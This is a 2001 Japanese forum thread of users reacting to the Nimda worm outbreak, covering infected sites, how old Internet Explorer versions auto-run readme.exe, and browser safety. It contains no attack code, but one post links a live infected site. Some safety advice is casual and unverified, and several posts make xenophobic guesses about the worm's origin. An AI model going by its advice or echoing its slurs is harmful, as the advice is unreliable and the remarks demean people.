@ だよたぶん @も \@ と \でエスケープしてみて
887 :
:01/09/19 09:36 ID:CIjuhvgQ
@マークの前にも¥を置かないと・・・・・
>>881 5.5 SP2なら自動実行はされないから、
実行してなければ大丈夫なはず。
889 :
:01/09/19 09:38 ID:OO3wQbOI
>>885 トップに書いてあるのは、8月20日のJavaScriptの件だ…。
今回のは対応されていない。トップも盛大に感染しているし。
890 :
:01/09/19 09:39 ID:CIjuhvgQ
891 :
:01/09/19 09:42 ID:LtZXWdgc
すげぇ この板ってセキュ板住民よりすげぇじゃねぇか? セキュ板見てたらニュース板の奴らウイルスだって騒いでるよ ウイルスじゃないのにツーようなかんじで書いてあったぞ。 セキュ板もう当てにしないよ
892 :
のこ :01/09/19 09:43 ID:yjsoab4s
新型ウィルスNimdaかな? winNTと2000はやばいらしい。 あと、98、95は大丈夫とのこと。 まったく文字のないメールとか妙なメールがきてない? それがやばいらしいから、あやしいメールはすぐ削除してみて。。 でもすでに感染してるならおそいかも。。。 対処法はわからないけど、とりあえずNimdaで検索エンジンあたって みることをおすすめします。 おだいじに。
893 :
七視 :01/09/19 09:44 ID:eEj49DS.
サーバー管理者へのメッセージは要らない?
894 :
マァヴ ★ :01/09/19 09:44 ID:???
ど、どうよ?(^_^;)
895 :
:01/09/19 09:45 ID:OO3wQbOI
これって、クラゲみたいに、変態する高度なウィルスだよな。 親体はIISサーバー同士で感染しあう。 アクセスしてきた、IE5.0に子供を感染させる。 子供も周りにどんどん拡がる…。 子供が親に戻る機能はあるんだろうか?
896 :
マァヴ ★ :01/09/19 09:45 ID:???
やったー!(^_^;)御教授感謝!
897 :
きつね :01/09/19 09:45 ID:yPjgNCbo
>894 イイ!
898 :
/ :01/09/19 09:46 ID:V9H78zq2
899 :
:01/09/19 09:46 ID:CIjuhvgQ
>>891 セキュ板見てないから文脈よく分からんけど、
ウイルスじゃなくてワームだって言いたいんじゃない?
901 :
非対応ブラウザで見ないでね。 :01/09/19 09:48 ID:OO3wQbOI
オークネット
http://www2.e-auc.ne.jp/ 凄いコメントだ…。
---------------------------------------------
当ページはSSLによる暗号化とべリサイン社によるサー
バ認証により高い安全性を確保し、安心してインターネッ
トをご利用いただけます。
---------------------------------------------
902 :
:01/09/19 09:49 ID:LtZXWdgc
あぁ俺絶対感染してるよ つかIIS鯖に飛ばされまくってんだけど 感染と関係あるのかなぁ? ああ鬱だ emlがいっぱいある・・・
903 :
:01/09/19 09:50 ID:qSOu2Upo
>>901 感染先晒すときはリンク張らないようにしなよ・・・
904 :
ニダ :01/09/19 09:51 ID:4o/feuXU
■新種ウイルス「Nimda」の感染拡大=米司法長官■
http://headlines.yahoo.co.jp/hl?a=20010919-00000116-jij-bus_all 【シリコンバレー18日時事】「Nimda(ニムダ)」と
呼ばれる危険度の高い新種のコンピューターウイルスが登場し、
ウイルス対策会社などが注意を呼び掛けている。
米国では同時テロが発生した直後だけに、インターネットを
利用したサイバーテロの活発化が懸念されていたが、
アシュクロフト司法長官は18日、「現時点で(ウイルスと)
テロとの関連を示す証拠はない」としている。
米ウイルス対策大手シマンテックによると、同ウイルスは、
電子メールで届けられる添付ファイル「readme.exe」
に潜み、これを利用者が不用意に開くことで感染する。
感染したコンピューターは、ウイルスメールを外部に発信。
マイクロソフト製ウェブサーバーソフトを利用している他の
コンピューターに対して同ソフトのセキュリティーホール(欠陥)
を狙った攻撃を仕掛ける。 (時事通信)[9月19日9時3分更新]
905 :
:01/09/19 09:52 ID:LtZXWdgc
つーか昨日の夜セキュいたで危険は少ないって行ってたから 行って落としちゃったんだよね。 糞
906 :
:01/09/19 09:52 ID:OO3wQbOI
907 :
:01/09/19 09:52 ID:LtZXWdgc
つかIIS鯖に飛ばされまくってんだけど 感染と関係あるのかなぁ?
908 :
31アイスクリーム :01/09/19 09:53 ID:prNHR8MU
とりあえず一番拡散の恐れの高かった信用組合(金融機関)にはメールしておいた。 (ノートンを更新したら、感染ページを開くと自動的に警告窓が出て Nimdaを弾くようになってた)
909 :
名無しさん :01/09/19 09:54 ID:MfeMxjZ6
ニムダってなんか韓国語っぽいなあ。
910 :
:01/09/19 09:55 ID:qSOu2Upo
>>905 実行してないなら問題ないでしょ。
ただ、IEのバージョンによっては自動実行されてしまうから危険なんで。
911 :
:01/09/19 09:57 ID:WLemDI/2
誰か新スレたてて下さい。 今度はインパクトのある【お題】で・・・
912 :
名無しさん@お腹いっぱい :01/09/19 09:57 ID:iUSdnviQ
MSNのページが開けないってことは IEのアップグレードすることもできないじゃん。 どうしたらいいの?
913 :
名無し :01/09/19 09:58 ID:r9Obg67M
PC再起動できなくなるかもよ。怖い。
914 :
:01/09/19 09:58 ID:V2f5utYw
あっという間に伸びると思っていたんだけど 新スレまでかなり時間かかったね。
915 :
:01/09/19 09:59 ID:CIjuhvgQ
916 :
:01/09/19 10:00 ID:ERPQai/o
???
917 :
:01/09/19 10:00 ID:qSOu2Upo
918 :
:01/09/19 10:00 ID:TH3yhgJE
919 :
912 :01/09/19 10:00 ID:iUSdnviQ
アリガト
920 :
:01/09/19 10:01 ID:0hSV8Kps
IE6なんだけど大丈夫? あとネスケでの危険性も教えてプリーズ!!
921 :
^^。 :01/09/19 10:01 ID:YqOIBj/g
まだ状況わからんですが、気をつけようage。
922 :
:01/09/19 10:02 ID:CIjuhvgQ
>>920 IE6で試してみましたが、感染したページを開くと「実行しますか?」のウインドウが出てくるので、
そこでキャンセルすれば問題ないです。
924 :
:01/09/19 10:03 ID:mxUXkeNs
>>917 今回はMSより2チャンのほうが 早いし正確だったな
だってIE5.00も感染が確認されたもの(藁
925 :
:01/09/19 10:03 ID:qSOu2Upo
>>918 よく気付いたね・・・
今msn.co.jpのトップ見たけど、何処からリンク張られてる?
そのページへのリンク見当たらないんだけど。
926 :
Mac鯖だけど :01/09/19 10:04 ID:jBy9Jubo
ログみるとすごいね。みんな感染しまくりだよ。 なんか疫病に冒された患者が押し寄せてる感じだよ。
927 :
名無し :01/09/19 10:05 ID:r9Obg67M
>新種のワームによる被害をこうむりました。 おいおい、てめえのセキュリティホールだろうが!!!!!!
928 :
:01/09/19 10:05 ID:9aCAso0I
関係ないんだけど、昨日ネットサフィーン中に「ネットスケープ レジストリアップデート」とかいうのが勝手に起動した人いる? ウイルス騒動が昨日なんでなんか怖い。
929 :
名無しさん :01/09/19 10:06 ID:xd.89Pkw
うちもルーターのログ見ると、有りもしないWebサーバー:80を見に来た お客さんが大量に記録されてる。主にキムチの国から。
930 :
918 :01/09/19 10:06 ID:TH3yhgJE
Last-Modified: Wed, 19 Sep 2001 00:43:41 GMT だって。 中央下の方にMSN トゥディってあるでしょ。そこにあるよ。 本当にコソーリと。
931 :
マァヴ ★ :01/09/19 10:07 ID:???
さらに改良
932 :
名無し :01/09/19 10:07 ID:U6Vgr72U
IEのバージョンて、どうやったらわかるの?
933 :
:01/09/19 10:08 ID:0hSV8Kps
934 :
b :01/09/19 10:08 ID:QvMXDT4M
>>926 俺のところも見てみた(ちゃんとパッチ済みのIIS。Code Redにも感染せず)けど、
鬱になるくらい多いな・・
並立させてapacheなサーバもいるが、こっちも同程度。
936 :
:01/09/19 10:08 ID:WLemDI/2
>>932 IEのヘルプ見たらわかるYO
937 :
マァヴ ★ :01/09/19 10:08 ID:???
ちょっと変だった(^_^;)
938 :
925 :01/09/19 10:09 ID:qSOu2Upo
>>930 ほんとだ。
ほんとにコソーリ。
さも他人事のように。
939 :
:01/09/19 10:09 ID:mxUXkeNs
940 :
:01/09/19 10:11 ID:CIjuhvgQ
俺が警告メール出してあげた会社、未だにそのままじゃん! もう、10時過ぎてるぞ!早く気が付けって!
941 :
のこ :01/09/19 10:11 ID:yjsoab4s
やっぱりそれはNimdaだ。 やばいWebの特徴は最後に妙なスクリプトがついてるらしい。 あと、メールでひろがるけど、README.EXE.がやばい から削除してね。 ちなみに、Nimdaの正式名称はW32/Nimda.A-mm。 おだいじに。
942 :
:01/09/19 10:13 ID:OO3wQbOI
今回のは、既発のパッチが完璧に当たった、IISサーバにも感染するの?
943 :
:01/09/19 10:13 ID:WLemDI/2
>>マァヴ ★ さんへ お疲れさま〜。 今回は、どこを改良したのですか??
944 :
_ :01/09/19 10:13 ID:NPM5a906
どうやら話題のコンピューターウイルスに感染したみたいです。 セキが止まらず、体がダルく、熱が38度あってフラフラなのですが ノートンとかウイルスバスターとかを起動すれば直るのでしょうか?
945 :
ナナシサン :01/09/19 10:15 ID:ETHVTTR2
>944 モニターに頭ぶつけましょう! ひびが入るまで!
946 :
:01/09/19 10:16 ID:WLemDI/2
>>マァヴ ★ さんへ すみません。 カチュからだったので気がつきませんでした。 さっきよりもイイ(^0^)/
947 :
:01/09/19 10:16 ID:H1sqALwQ
948 :
おぶちおだぶつばんざい :01/09/19 10:16 ID:rUiXeQag
リナクサーだから関係ないや。 LINUXばんざい
949 :
マァヴ ★ :01/09/19 10:16 ID:???
950 :
ななしじゃにー :01/09/19 10:16 ID:vr2hUFr6
952 :
ニムダをハングルで書いてみました。 :01/09/19 10:17 ID:OO3wQbOI
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□ □□□□□□□□□□□■□□□□□□□□□□□□□□■□□□□ □■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□ □■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□ □■□□□□□□□□□■□□□□■■■■■■■■□□■□□□□ □■□□□□□□□□□■□□□□■□□□□□□□□□■□□□□ □■□□□□□■■■□■□□□□■□□□□□□□□□■□□□□ □■■■■■■□□□□■□□□□■□□□□□□□□□■■■■■ □□□□□□□□□□□■□□□□■□□□□□□□□□■□□□□ □□□□□□□□□□□□□□□□■□□□□□□□□□■□□□□ □□□□□□□□□□□□□□□□■■■■■■■■□□■□□□□ □□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□ □□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□ □□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□ □□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□ □□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□ □□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
953 :
マァヴ ★ :01/09/19 10:19 ID:???
ちなみにロビーではあの、みみずん ★のサーバがやられました(^_^;) 再インストール決定だって・・・・。
954 :
:01/09/19 10:19 ID:9aCAso0I
ネスケerは大丈夫か。
955 :
:01/09/19 10:19 ID:ERPQai/o
956 :
:01/09/19 10:21 ID:OO3wQbOI
>>955 正解キボンヌ! ほとんどハングルを知らないもので。
ユニコードで ? ?
では間違い? nim-daではダメなの?
957 :
:01/09/19 10:23 ID:OO3wQbOI
>>956 ありゃ、bbs.cgiにつぶされた…。
&#45784; &#45796;
958 :
:01/09/19 10:26 ID:9aCAso0I
1個ずつアップデートするのがだるいからサービスパックがほしい(Win98) 去年の10月から放置してる問題もあるし、OSも発売2年ほどで放置気味になってるね。 金とってこれは酷いぞ。
959 :
:01/09/19 10:28 ID:sjx46clI
>>マァヴ ★ さんへ みみずん★さんの応援に行くのかな?? とりあえず、がんばって下さい!!
960 :
:01/09/19 10:34 ID:ERPQai/o
>>952 良く見たら「ノッダ」だよ
>>956 □
LI ←ニ T ←ム [ト ←ダ
という感じですな。
(あんま関係無いけど、ハングル文字って勉強すると面白いよ)
961 :
:01/09/19 10:35 ID:ERPQai/o
962 :
:01/09/19 10:40 ID:OO3wQbOI
Tって、"U"って発音じゃありませんでしたっけ。 Nim - da で2文字にするんですよね?
963 :
:01/09/19 10:40 ID:ygb9b/5M
私は高校2年生の時に自分の性格を直したくて、 コンクリートの壁に頭を打ちつけながら「毎食茶碗1杯」の御飯で2年間押し通したんです。 ウソだと思ったら、お袋に聞いてみれば解ります。
964 :
:01/09/19 10:41 ID:ygb9b/5M
20代の頃、デートをしてホテルで食事をした時に、私は「箸を下さい」と注文しました。 すると、 相手の女性が、「田中さん、恥ずかしいからヤメテ」---と言うのです。 私は、その場で立ちあがり黙って帰りました。 (「若気の至り」でした。) 2度と会いませんでした(腹の中で、「この馬鹿おんな」と思いました)。 冗談じゃない!。 ナイフ・フォークはチンパンジーだって使えるんです。 箸の方が道具として総合的に優れており、歴史的にも長い歴史を持っています。
965 :
:01/09/19 10:41 ID:OtlH8lsE
ラディンに違いない!
966 :
風邪でお休み 教育TV :01/09/19 10:42 ID:OtlH8lsE
967 :
nanasisan :01/09/19 10:55 ID:cHdYfY8g
1000
968 :
:01/09/19 10:59 ID:OO3wQbOI
>>955 それで、正解はどうなのぉぉぉぉ!
教えて下さいまし。
969 :
:01/09/19 11:05 ID:FuLL34vM
いつかマックワールドでAPPLEもウイルス入りCD配ってたな。
MSNの鯖って日本だったっけ??
1000ゲットー!  ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´ ∧∧ ) (´⌒(´ ⊂(゚Д゚;⊂⌒`つ≡≡≡(´⌒;;;≡≡≡  ̄ ̄ (´⌒(´⌒;; ズザーーーーーッ
972 :
:01/09/19 11:54 ID:CU3Xh.Cw
1000取ったやつはうんこ
973 :
名無しさん :01/09/19 11:56 ID:VKE9ZaK.
974 :
:01/09/19 11:58 ID:F3B6DF3k
>>968 955で正しいですよ。
L=n |=i 口=m 匚=d(t) 卜=a
975 :
:01/09/19 12:17 ID:OO3wQbOI
>>960 ひょっとして知ったか?
正解を答えてみろyo!
976 :
(´ー`)y-~~ :01/09/19 12:46 ID:5Gm8qeQs
977 :
1000 :01/09/19 12:48 ID:RmQw2Dvk
1000
旧レスあげてスマソ。 宇津駄。
979 :
:01/09/19 12:51 ID:OO3wQbOI
>>976 そゆこと。IE5.0だと、それをそのままダウンロードして、しかも
readme.emlの中にある、readme.exeを勝手に実行してしまう。
IE5.5SP2とかでも、ダウンロードしますか?って聞かれて、はいと答えると、
readme.exeを勝手に実行してしまう。
さらに、メールにreadme.exeが付いてくると、勝手に実行してしまう。
で実行されてしまうと、はい。おしまい。
980 :
:01/09/19 12:57 ID:7jAGOnQE
1000!
981 :
// :01/09/19 12:59 ID:aV2qc7XI
おお・・対策しました
982 :
・・ :01/09/19 13:00 ID:aV2qc7XI
IE6//べーたですが・・なにか?
983 :
100010 :01/09/19 13:01 ID:uFupd./s
1000
984 :
・・ :01/09/19 13:01 ID:aV2qc7XI
犯人は・・にむださん かんこっくのかたでせうか?
985 :
1000 :01/09/19 13:01 ID:uFupd./s
1 0 0 0
986 :
1000 :01/09/19 13:01 ID:uFupd./s
1000
987 :
神 :01/09/19 13:02 ID:spzt.8VY
梅毒感染
988 :
・・ :01/09/19 13:02 ID:aV2qc7XI
さ・・いってみようかあ
989 :
1000 :01/09/19 13:02 ID:1IAfWBlw
1000
990 :
1000 :01/09/19 13:02 ID:t5ePDc5w
1000
991 :
・・ :01/09/19 13:02 ID:aV2qc7XI
」 お・・どうだあ
992 :
ぬわわわ :01/09/19 13:02 ID:xj/Vx6ng
ぬわわわ
993 :
1000 :01/09/19 13:02 ID:uFupd./s
1000
994 :
1000 :01/09/19 13:02 ID:spzt.8VY
神
995 :
・・ :01/09/19 13:02 ID:aV2qc7XI
いけ
996 :
:01/09/19 13:02 ID:aTUyh9M.
1000
Tプルーフ
998 :
(V∀V)/~~~ :01/09/19 13:03 ID:9N7NeOAQ
1000
999 :
hy :01/09/19 13:03 ID:9N7NeOAQ
hj
1000 :
マホ? :01/09/19 13:03 ID:P2TGn6e6
1000Get
1001 :
1001 :Over 1000 Thread
このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。
1002 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。